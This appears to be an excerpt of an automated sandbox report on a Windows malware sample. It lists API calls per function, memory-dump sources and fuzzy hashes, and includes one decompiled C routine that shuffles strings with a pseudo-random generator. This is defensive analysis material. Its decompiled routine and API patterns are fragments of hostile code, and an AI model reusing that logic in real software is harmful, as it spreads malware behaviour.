                                                              • Part of subcall function 0457A976: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,?,00000000,?), ref: 0457A9FF
                                                              • Part of subcall function 0457A976: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,04581B1D), ref: 0457AA2B
                                                              • Part of subcall function 0457A976: TerminateProcess.KERNEL32(?,000003E5), ref: 0457AA41
                                                              • Part of subcall function 0457A976: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,04581B1D), ref: 0457AA55
                                                              • Part of subcall function 0457A976: CloseHandle.KERNEL32(?), ref: 0457AA88
                                                              • Part of subcall function 0457A976: CloseHandle.KERNEL32(?), ref: 0457AA8D
                                                            • _snprintf.NTDLL ref: 0456B8ED
                                                              • Part of subcall function 0457A976: GetLastError.KERNEL32 ref: 0457AA59
                                                              • Part of subcall function 0457A976: GetExitCodeProcess.KERNEL32(?,00000001), ref: 0457AA79
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,000000FF,00000000,000000FF,?,00000F00), ref: 0456B90A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Processlstrlen$CloseHandleHeapMultipleObjectsWait_snprintf$AllocateCodeCreateErrorExitFreeLastTerminatememsetwcstombs
                                                            • String ID:
                                                            • API String ID: 1481739438-0
                                                            • Opcode ID: e3b2c383b36711710762a0edbab6f7a9c0b181c578b799137a62f8f9e57b500a
                                                            • Instruction ID: a6da920b1020f7a848eb43b1a66ccf0a4db35c101c1429be1784dcbf34f8feaf
                                                            • Opcode Fuzzy Hash: e3b2c383b36711710762a0edbab6f7a9c0b181c578b799137a62f8f9e57b500a
                                                            • Instruction Fuzzy Hash: AE11BE72500229FFCF119F55EC84D9E3B6DFB08364F058019F909A7252CA35EE18EBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0457E44D, Relevance: 9.1, APIs: 6, Instructions: 64libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04583C35: RtlAllocateHeap.NTDLL(00000000,?,04580BE2), ref: 04583C41
                                                            • LoadLibraryA.KERNEL32(?,00000000,00000001,00000014,00000020,0457EF72,00000000,00000001), ref: 0457E46D
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0457E48C
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0457E4A1
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0457E4B7
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0457E4CD
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0457E4E3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: AddressProc$AllocateHeapLibraryLoad
                                                            • String ID:
                                                            • API String ID: 2486251641-0
                                                            • Opcode ID: 2321aaa0b1921d0defe4d4da17c1e6895c1279a7ef3a9cb56c7acf5b64097b4e
                                                            • Instruction ID: 46f04d15651992b94d5fe62286cf6175805e01fb81a7baab8e5daed4089f3980
                                                            • Opcode Fuzzy Hash: 2321aaa0b1921d0defe4d4da17c1e6895c1279a7ef3a9cb56c7acf5b64097b4e
                                                            • Instruction Fuzzy Hash: C111FBB2A0031B9F9721DB79ECC5D5773ECFB447447059569BA05E7202EE38E8099B70
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0456F3B3, Relevance: 9.1, APIs: 6, Instructions: 64memorystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlen.KERNEL32(?,00000001,00000000,00000000,?,?,0456F9BD,04562B99,00000057,00000000), ref: 0456F3C9
                                                            • RtlAllocateHeap.NTDLL(00000000,00000009,00000001), ref: 0456F3DC
                                                            • lstrcpy.KERNEL32(00000008,?), ref: 0456F3FE
                                                            • GetLastError.KERNEL32(04575D99,00000000,00000000,?,?,0456F9BD,04562B99,00000057,00000000), ref: 0456F427
                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,0456F9BD,04562B99,00000057,00000000), ref: 0456F43F
                                                            • CloseHandle.KERNEL32(00000000,04575D99,00000000,00000000,?,?,0456F9BD,04562B99,00000057,00000000), ref: 0456F448
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$AllocateCloseErrorFreeHandleLastlstrcpylstrlen
                                                            • String ID:
                                                            • API String ID: 2860611006-0
                                                            • Opcode ID: a6c36d133c94dc3858d61427c10d099a08ce86c8d99358adc8571b9ce9fb68cf
                                                            • Instruction ID: 4040b955583e6d8e2026f07ebd9addf57ef63de51e1b43d4308178f16861fcb5
                                                            • Opcode Fuzzy Hash: a6c36d133c94dc3858d61427c10d099a08ce86c8d99358adc8571b9ce9fb68cf
                                                            • Instruction Fuzzy Hash: 50116376500209EFDB109FA9E8888AE7BB8FB05365711442DF957E3640EB34AD45FB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 045790ED, Relevance: 9.1, APIs: 6, Instructions: 61stringthreadtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetTempPathA.KERNEL32(00000000,00000000,000003EE,?,00000000,?,?,?,04577791,00000929,00000000,?,?,045799D0,00000000,00000000), ref: 045790FF
                                                              • Part of subcall function 04583C35: RtlAllocateHeap.NTDLL(00000000,?,04580BE2), ref: 04583C41
                                                            • GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04577791,00000929,00000000,?,?,045799D0,00000000,00000000,?,0000000E), ref: 04579118
                                                            • GetCurrentThreadId.KERNEL32 ref: 04579125
                                                            • GetSystemTimeAsFileTime.KERNEL32(0456EE33,?,?,?,04577791,00000929,00000000,?,?,045799D0,00000000,00000000,?,0000000E), ref: 04579131
                                                            • GetTempFileNameA.KERNEL32(00000000,00000000,0456EE33,00000000,?,?,?,04577791,00000929,00000000,?,?,045799D0,00000000,00000000,?), ref: 0457913F
                                                            • lstrcpy.KERNEL32(00000000), ref: 04579161
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Temp$FilePathTime$AllocateCurrentHeapNameSystemThreadlstrcpy
                                                            • String ID:
                                                            • API String ID: 1175089793-0
                                                            • Opcode ID: 841ff6bd0c0da5e8991e51aaf5d603a01bf66c340207ad7da1b221083238e9e2
                                                            • Instruction ID: 6927a8fa283d9de9deea1ec926900a8792a2b9f564f04fef39b7cf6cb47d6934
                                                            • Opcode Fuzzy Hash: 841ff6bd0c0da5e8991e51aaf5d603a01bf66c340207ad7da1b221083238e9e2
                                                            • Instruction Fuzzy Hash: 85014876A00116ABA7115BA6AC8CD6B7BBCFFC5B847050029F905F7101DE68FC15A674
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0456328A, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 207COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: ErrorLastmemset
                                                            • String ID: vids
                                                            • API String ID: 3276359510-3767230166
                                                            • Opcode ID: 34060d4e2c42758c98792dd34dfa87c321e34ca78eba25767d097a00d5ec2956
                                                            • Instruction ID: e291bae35577ee65f22b651623b5832324e9e369b0bc52e9ae296941dd62db05
                                                            • Opcode Fuzzy Hash: 34060d4e2c42758c98792dd34dfa87c321e34ca78eba25767d097a00d5ec2956
                                                            • Instruction Fuzzy Hash: 31813AB1D00219EFDF11DFA8D88499DBBB9FF48704F10856AE816EB250D730A945DF60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04561731, Relevance: 8.9, APIs: 7, Instructions: 108stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memcpy.NTDLL(?,04576BB6,00000000,?,?,?,04576BB6,?,?,?,?,?), ref: 0456176F
                                                            • lstrlen.KERNEL32(04576BB6,?,?,?,04576BB6,?,?,?,?,?), ref: 0456178D
                                                            • memcpy.NTDLL(?,?,?,?,?,?,?), ref: 045617FC
                                                            • lstrlen.KERNEL32(04576BB6,00000000,00000000,?,?,?,04576BB6,?,?,?,?,?), ref: 0456181D
                                                            • lstrlen.KERNEL32(03F8458B,?,?,?,?,?,?,?), ref: 04561831
                                                            • memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,?,?), ref: 0456183A
                                                            • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 04561848
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: lstrlenmemcpy$FreeLocal
                                                            • String ID:
                                                            • API String ID: 1123625124-0
                                                            • Opcode ID: b57b6d85f10433f99b208c001940bd8c05b14cff3e882e718d77ddd06fb9372d
                                                            • Instruction ID: e2d9a39e787f6d669f7c20011e64f0c4700543d3084657aa5ece23dd00855764
                                                            • Opcode Fuzzy Hash: b57b6d85f10433f99b208c001940bd8c05b14cff3e882e718d77ddd06fb9372d
                                                            • Instruction Fuzzy Hash: 2841EA7280021AAFDF11DF65DC419DB3BA8FF142A4B054419FD15A7210EB35EE64ABE0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0457BE8F, Relevance: 7.7, APIs: 6, Instructions: 163COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memcpy.NTDLL(?,04575AB0,00000010,?,?,?,?,?,?,?,?,?,?,04583452,00000000,00000001), ref: 0457BEE0
                                                            • memcpy.NTDLL(00000000,00000001,04575AB0,0000011F), ref: 0457BF73
                                                            • GetLastError.KERNEL32(?,?,0000011F), ref: 0457BFCB
                                                            • GetLastError.KERNEL32 ref: 0457BFFD
                                                            • GetLastError.KERNEL32 ref: 0457C011
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,04583452,00000000,00000001,04575AB0,?,04575AB0), ref: 0457C026
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: ErrorLast$memcpy
                                                            • String ID:
                                                            • API String ID: 2760375183-0
                                                            • Opcode ID: 1faada624cec09325f144c53df1ad1800bb006b85370609e4e20ef983635d945
                                                            • Instruction ID: 6cb2ed41f17e4a23177a432fb45cbc40f60acac91323589edd6f9fd17ec1c6fc
                                                            • Opcode Fuzzy Hash: 1faada624cec09325f144c53df1ad1800bb006b85370609e4e20ef983635d945
                                                            • Instruction Fuzzy Hash: 3B514E71900209FFDB11DFA9EC84AAEBBB9FB44754F008429F911E6140E735AE54EF61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0456F227, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 146stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04583C35: RtlAllocateHeap.NTDLL(00000000,?,04580BE2), ref: 04583C41
                                                            • lstrcpy.KERNEL32(00000001,00000020), ref: 0456F324
                                                            • lstrcat.KERNEL32(00000001,00000020), ref: 0456F339
                                                            • lstrcmp.KERNEL32(00000000,00000001), ref: 0456F350
                                                            • lstrlen.KERNEL32(00000001), ref: 0456F374
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                                            • String ID:
                                                            • API String ID: 3214092121-3916222277
                                                            • Opcode ID: a0ce8e14722b1f72c22f3237418ff9115b78dad35c20417365e1b693d4dd8a31
                                                            • Instruction ID: ec556ed5c16516401e84954e222dd5e2ea243534640961a7a294122742a77ab9
                                                            • Opcode Fuzzy Hash: a0ce8e14722b1f72c22f3237418ff9115b78dad35c20417365e1b693d4dd8a31
                                                            • Instruction Fuzzy Hash: 0C518136E00218EFDF11CF99E9846ADBBB6FF45314F15805AE816AB205CB70BA51EF50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DD1ADC, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145stringCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 22%
                                                            			E00DD1ADC(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E00DD77D7(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E00DD77EC(_v16);
								goto L37;
							}
							_t103 = E00DD77D7((_v8 + _v8 + 5) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0xdda2cc = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124);
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}





















                                                            0x00dd1ae3
                                                            0x00dd1aea
                                                            0x00dd1aef
                                                            0x00dd1af2
                                                            0x00dd1af9
                                                            0x00dd1afc
                                                            0x00dd1aff
                                                            0x00dd1b06
                                                            0x00dd1b09
                                                            0x00dd1c5d
                                                            0x00dd1c5f
                                                            0x00dd1c61
                                                            0x00dd1c66
                                                            0x00dd1c66
                                                            0x00dd1b0f
                                                            0x00dd1b12
                                                            0x00dd1b15
                                                            0x00dd1b17
                                                            0x00dd1b17
                                                            0x00dd1b1b
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd1b1f
                                                            0x00dd1b4b
                                                            0x00dd1b50
                                                            0x00dd1b52
                                                            0x00dd1b52
                                                            0x00dd1b55
                                                            0x00dd1b58
                                                            0x00dd1b58
                                                            0x00dd1b5a
                                                            0x00000000
                                                            0x00dd1b25
                                                            0x00dd1b27
                                                            0x00dd1b46
                                                            0x00dd1b46
                                                            0x00dd1b5d
                                                            0x00dd1b5d
                                                            0x00dd1b5e
                                                            0x00dd1b5e
                                                            0x00dd1b61
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd1b61
                                                            0x00dd1b2b
                                                            0x00dd1b72
                                                            0x00dd1b76
                                                            0x00dd1c50
                                                            0x00dd1c52
                                                            0x00dd1c52
                                                            0x00dd1c53
                                                            0x00dd1c56
                                                            0x00000000
                                                            0x00dd1c56
                                                            0x00dd1b90
                                                            0x00dd1b94
                                                            0x00dd1c4c
                                                            0x00000000
                                                            0x00dd1c4c
                                                            0x00dd1b9a
                                                            0x00dd1b9d
                                                            0x00dd1ba1
                                                            0x00dd1ba7
                                                            0x00dd1baa
                                                            0x00dd1c42
                                                            0x00dd1c42
                                                            0x00000000
                                                            0x00dd1c48
                                                            0x00dd1bb5
                                                            0x00dd1bbe
                                                            0x00dd1bd2
                                                            0x00dd1bd9
                                                            0x00dd1bee
                                                            0x00dd1bf4
                                                            0x00dd1bfc
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd1bfe
                                                            0x00dd1bfe
                                                            0x00dd1bfe
                                                            0x00dd1c05
                                                            0x00dd1c0d
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd1c0f
                                                            0x00dd1c18
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd1c1a
                                                            0x00dd1c1c
                                                            0x00dd1c1f
                                                            0x00dd1c1f
                                                            0x00dd1c22
                                                            0x00dd1c26
                                                            0x00dd1c29
                                                            0x00dd1c2f
                                                            0x00dd1c32
                                                            0x00dd1c39
                                                            0x00000000
                                                            0x00dd1bb5
                                                            0x00dd1b30
                                                            0x00dd1b3b
                                                            0x00dd1b3e
                                                            0x00dd1b40
                                                            0x00dd1b40
                                                            0x00dd1b43
                                                            0x00dd1b45
                                                            0x00000000
                                                            0x00dd1b45
                                                            0x00dd1b1f
                                                            0x00dd1b65
                                                            0x00dd1b6a
                                                            0x00dd1b6c
                                                            0x00dd1b6c
                                                            0x00dd1b6f
                                                            0x00dd1b6f
                                                            0x00000000

                                                            APIs
                                                              • Part of subcall function 00DD77D7: RtlAllocateHeap.NTDLL(00000000,00000000,00DD1275), ref: 00DD77E3
                                                            • lstrcpy.KERNEL32(69B25F45,00000020), ref: 00DD1BD9
                                                            • lstrcat.KERNEL32(69B25F45,00000020), ref: 00DD1BEE
                                                            • lstrcmp.KERNEL32(00000000,69B25F45), ref: 00DD1C05
                                                            • lstrlen.KERNEL32(69B25F45), ref: 00DD1C29
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                                            • String ID:
                                                            • API String ID: 3214092121-3916222277
                                                            • Opcode ID: 799f44b36738f1e0cd91980f2a18ac1563a670e4520ed468b42d2500eaa5fe44
                                                            • Instruction ID: 566bf09b9c64c434ada29bddf567b048eeee0278b5076a0a70aadd814e841f05
                                                            • Opcode Fuzzy Hash: 799f44b36738f1e0cd91980f2a18ac1563a670e4520ed468b42d2500eaa5fe44
                                                            • Instruction Fuzzy Hash: 9651BF39A00218FBDF10DF99C8846ADFBBAFF56314F19805BE8599B311D730AA41CB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0457F081, Relevance: 7.6, APIs: 6, Instructions: 137stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04562B55: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,770F4620,00000000,00000000,0456114F,?), ref: 04562B66
                                                              • Part of subcall function 04562B55: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,00000000), ref: 04562B83
                                                            • lstrlenW.KERNEL32(00000000,00000000,73B006E0,?,?,80000001,?), ref: 0457F0C7
                                                            • lstrlenW.KERNEL32(00000008), ref: 0457F0CE
                                                            • lstrlenW.KERNEL32(?,?), ref: 0457F0EA
                                                            • lstrlen.KERNEL32(?,?,00000000), ref: 0457F164
                                                            • lstrlenW.KERNEL32(?), ref: 0457F170
                                                            • wsprintfA.USER32 ref: 0457F19E
                                                              • Part of subcall function 04583C4A: RtlFreeHeap.NTDLL(00000000,?,045630B5,00000000,?,00000104,04580BF9,?,00000250,?,00000000), ref: 04583C56
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: lstrlen$EnvironmentExpandStrings$FreeHeapwsprintf
                                                            • String ID:
                                                            • API String ID: 3384896299-0
                                                            • Opcode ID: b3e7adb211b0215be096b2982fa1449ed5636e48650079af329b478b5ec97a29
                                                            • Instruction ID: 1d0c16c17d8e2534da2e3c03e84365eb9496c1b45a8210d0956b9f7885f5d6f7
                                                            • Opcode Fuzzy Hash: b3e7adb211b0215be096b2982fa1449ed5636e48650079af329b478b5ec97a29
                                                            • Instruction Fuzzy Hash: 6541407690010AEFDB01EFA9DC84D9E7BB9FF44204B054469F915E7211EF35E914AB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0456245C, Relevance: 7.6, APIs: 5, Instructions: 122memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 045624F8
                                                            • memcpy.NTDLL(00000000,?,?), ref: 0456250B
                                                            • RtlEnterCriticalSection.NTDLL(0458C328), ref: 0456251C
                                                            • RtlLeaveCriticalSection.NTDLL(0458C328), ref: 04562531
                                                            • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 04562569
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: CriticalHeapSection$AllocateEnterFreeLeavememcpy
                                                            • String ID:
                                                            • API String ID: 4069371292-0
                                                            • Opcode ID: f9ae3adfe5504b6fab831092b07d6b3f6631667ddc8de5ae1145bc212d1a17ba
                                                            • Instruction ID: 464e13ac6de13812a310bfa814516407ea7126216c8c1ada2ce3bc9dd5ae7f92
                                                            • Opcode Fuzzy Hash: f9ae3adfe5504b6fab831092b07d6b3f6631667ddc8de5ae1145bc212d1a17ba
                                                            • Instruction Fuzzy Hash: DD31E436017B20BBC7228A28FCD1DD7BBA9FF56726704855CF0D616501EA3478879BE0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0457F58E, Relevance: 7.6, APIs: 6, Instructions: 122stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlenW.KERNEL32(?,0458522F,049B99A0,00000057), ref: 0457F5B0
                                                            • lstrlenW.KERNEL32(?,0458522F,049B99A0,00000057), ref: 0457F5C1
                                                            • lstrlenW.KERNEL32(?,0458522F,049B99A0,00000057), ref: 0457F5D3
                                                            • lstrlenW.KERNEL32(?,0458522F,049B99A0,00000057), ref: 0457F5E5
                                                            • lstrlenW.KERNEL32(?,0458522F,049B99A0,00000057), ref: 0457F5F7
                                                            • lstrlenW.KERNEL32(?,0458522F,049B99A0,00000057), ref: 0457F603
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: lstrlen
                                                            • String ID:
                                                            • API String ID: 1659193697-0
                                                            • Opcode ID: a0b3f4590bca720ae86f9937760f41cca70c867077460d4109f2b6cb9aee5779
                                                            • Instruction ID: d41170948dee8c174795cc16a76a5f03d3e5d380aa05d28f6c2c9051405ec67b
                                                            • Opcode Fuzzy Hash: a0b3f4590bca720ae86f9937760f41cca70c867077460d4109f2b6cb9aee5779
                                                            • Instruction Fuzzy Hash: B8412072E0020AAFDB10DFA9E8C0A6EB7F9FF98604B14887DD515E3210E774E905AB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0457878B, Relevance: 7.6, APIs: 5, Instructions: 102synchronizationCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04578D4F: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 04578D5B
                                                              • Part of subcall function 04578D4F: SetLastError.KERNEL32(000000B7,?,0457879F,?,?,00000000,?,?,?), ref: 04578D6C
                                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,00000000,?,?,?), ref: 045787BF
                                                            • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 04578897
                                                              • Part of subcall function 0456CDCB: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 0456CDE5
                                                              • Part of subcall function 0456CDCB: CreateWaitableTimerA.KERNEL32(0458C1A8,00000001,?), ref: 0456CE02
                                                              • Part of subcall function 0456CDCB: GetLastError.KERNEL32(?,00000000,04567AF7,00000000,00000000,00008008), ref: 0456CE13
                                                              • Part of subcall function 0456CDCB: GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,?,?,00000000,04567AF7,00000000,00000000,00008008), ref: 0456CE53
                                                              • Part of subcall function 0456CDCB: SetWaitableTimer.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,00000000,04567AF7,00000000,00000000,00008008), ref: 0456CE72
                                                              • Part of subcall function 0456CDCB: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,04567AF7,00000000,00000000,00008008), ref: 0456CE88
                                                            • GetLastError.KERNEL32(?,?,?,00000000,?,?,?), ref: 04578880
                                                            • ReleaseMutex.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 04578889
                                                              • Part of subcall function 04578D4F: CreateMutexA.KERNEL32(0458C1A8,00000000,?,?,0457879F,?,?,00000000,?,?,?), ref: 04578D7F
                                                            • GetLastError.KERNEL32(?,?,00000000,?,?,?), ref: 045788A4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: ErrorLast$MutexTimerWaitable$CreateOpenTime$CloseFileFreeHandleHeapMultipleObjectsReleaseSystemWait
                                                            • String ID:
                                                            • API String ID: 1700416623-0
                                                            • Opcode ID: 3e168a4373c3833c7ae1e7728608cf7a2d57e4f62757d9d3e1882cc5b64a9d15
                                                            • Instruction ID: 51e23fda43a74285ddfd6691212f9ac301269628f5bcf4ee103f5c0f84cca631
                                                            • Opcode Fuzzy Hash: 3e168a4373c3833c7ae1e7728608cf7a2d57e4f62757d9d3e1882cc5b64a9d15
                                                            • Instruction Fuzzy Hash: FE318971A00205EFCB11AF75EC8496E7BF9FB84394B14447AE811E7390DA38AC04FB61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 045705FC, Relevance: 7.6, APIs: 5, Instructions: 101memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlImageNtHeader.NTDLL(00000000), ref: 04570615
                                                              • Part of subcall function 0457B54C: GetModuleFileNameW.KERNEL32(?,00000000,00000104,00000208,00000000,00000000,?,?,0456138B,00000000,0458C16C,00000000), ref: 0457B572
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000001,?,00000000,04561C48,00000000), ref: 04570657
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000001), ref: 045706A9
                                                            • VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,00000000,00000000,?,00000000,00000000,00000001,?,00000000,04561C48,00000000), ref: 045706C2
                                                              • Part of subcall function 04583CDF: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 04583D00
                                                              • Part of subcall function 04583CDF: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,?,?,?,04570648,00000000,00000000,00000000,00000001,?,00000000), ref: 04583D43
                                                            • GetLastError.KERNEL32(?,00000000,04561C48,00000000), ref: 045706FA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$Free$AllocAllocateErrorFileHeaderImageLastModuleNameVirtual
                                                            • String ID:
                                                            • API String ID: 1921436656-0
                                                            • Opcode ID: e3a0b9f78941b61d820d20448fa4f55f7f69494811f0e60097df83fa9cfa0e26
                                                            • Instruction ID: ab4a04efe2e8e31108697ec464c88ab14b5b8a65c60685938011fb82027c80e4
